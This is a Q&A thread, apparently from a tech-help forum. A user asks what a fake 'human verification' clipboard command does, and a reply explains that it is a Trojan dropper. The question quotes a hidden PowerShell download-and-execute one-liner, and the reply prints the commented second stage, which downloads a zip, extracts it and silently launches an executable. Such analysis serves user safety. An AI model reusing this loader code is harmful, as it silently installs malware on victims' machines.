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What does this command prompt input do?

This is the input:

cmd.exe /c powershell -WindowStyle Hidden -Command "$rQd=''; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;"

This was on my clipboard after clicking a "human verification" button on some video download webapp. It told me that, in order to verify, I must hit Win + R, Ctrl + V, then Enter.

Thankfully, I already know what Win + R does, so I didn't follow those "verification instructions."

It looks like it downloads something, but I'm not sure what else.


  • To help you understand what the command is doing and perhaps helping future readers with similar issue, this is indeed downloading and executing a Trojan.

    In simple steps how you can determine this, first check the URL content with Invoke-RestMethod:


    You will see that the content is a PowerShell script. Immediately after you can see the suspicious at the top of the script, if you paste the .zip URL in you can see that it is indeed malicious:


    Aadding comments to understand what the code does:

    # defines download file
    $zxty = ''
    # defines destination file for the zip
    $qbrw = "$env:APPDATA\"
    # defines destination folder for the zip
    $lpmk = "$env:APPDATA\Install_4278"
    # defines destination path for the extracted `.exe` from this zip
    $vkdy = Join-Path $lpmk 'spPortableRun.exe'
    # if the destination folder doesnt exist
    if (!(Test-Path $lpmk)) {
        # creates it
        New-Item -Path $lpmk -ItemType Directory
    try {
        # tries to download `` to destination file ``
        $ghwd = New-Object System.Net.WebClient
        $ghwd.DownloadFile($zxty, $qbrw)
    catch {
    try {
        Add-Type -AssemblyName 'System.IO.Compression.FileSystem'
        # extract the downloaded zip to destination folder `Install_4278`
        [System.IO.Compression.ZipFile]::ExtractToDirectory($qbrw, $lpmk)
        # and delete the zip file
        Remove-Item $qbrw -Force
    catch {
    try {
        # starts the trojan extracted from the zip file
        # (should've been `spPortableRun.exe` in `Install_4278` folder)
        Start-Process -FilePath $vkdy -WindowStyle Hidden
    catch {

    And to summarize with comments, the -Command you would be executing:

    # defines content URL
    $rQd = ''
    # creates a WebClient object
    $pLs = New-Object System.Net.WebClient
    # download the string content
    # (this is pretty much like using `Invoke-RestMethod`)
    $sLf = $pLs.DownloadString($rQd)
    # `Invoke-Expression` here invokes the PowerShell script
    # embedded in the string content 
    Invoke-Expression $sLf